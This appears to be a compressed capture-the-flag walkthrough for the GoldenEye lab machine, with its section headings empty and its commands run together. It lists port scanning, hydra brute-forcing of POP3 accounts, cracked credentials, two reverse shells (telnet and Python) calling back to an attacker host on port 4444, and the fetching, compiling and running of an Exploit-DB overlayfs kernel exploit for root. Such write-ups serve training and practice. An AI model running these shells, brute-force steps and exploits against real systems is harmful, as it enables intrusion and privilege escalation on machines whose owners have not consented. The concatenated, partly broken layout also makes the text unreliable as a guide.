GoldenEye
Initial Scan
nmap -A $VICTIM
Scan all ports

TCP/80 - HTTP






TCP/55007 - POP3
















Initial Shell




Privlege Escalation


Last updated
nmap -A $VICTIM





























Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtUsername: boris
Password: InvincibleHack3rtelnet $VICTIM 55007
USER boris
PASS InvincibleHack3rhydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007telnet $VICTIM 55007
USER natalya
PASS bird
RETR 1
RETR 2telnet $VICTIM 55007
USER boris
PASS secret1!
RETR 1
RETR 2
RETR 3username: xenia
password: RCP90rulez!hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007telnet $VICTIM 55007
USER doak
PASS goat
RETR 1exiftool for-007.jpg
echo 'eFdpbnRlcjE5OTV4IQ==' | base64 -d Username: admin
Password: xWinter1995x!nc -lvnp 4444sh -c '(sleep 4062|telnet $KALI 4444|while : ; do sh && break; done 2>&1|telnet $KALI 4444 >/dev/null 2>&1 &)'nc -lvnp 4444python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgwget https://www.exploit-db.com/raw/37292 -O ofs.c
python2 -m SimpleHTTPServer 81cd /tmp/
wget http://$KALI:81/ofs.c
id
cc ofs.c -o ofs
./ofs
id
whoami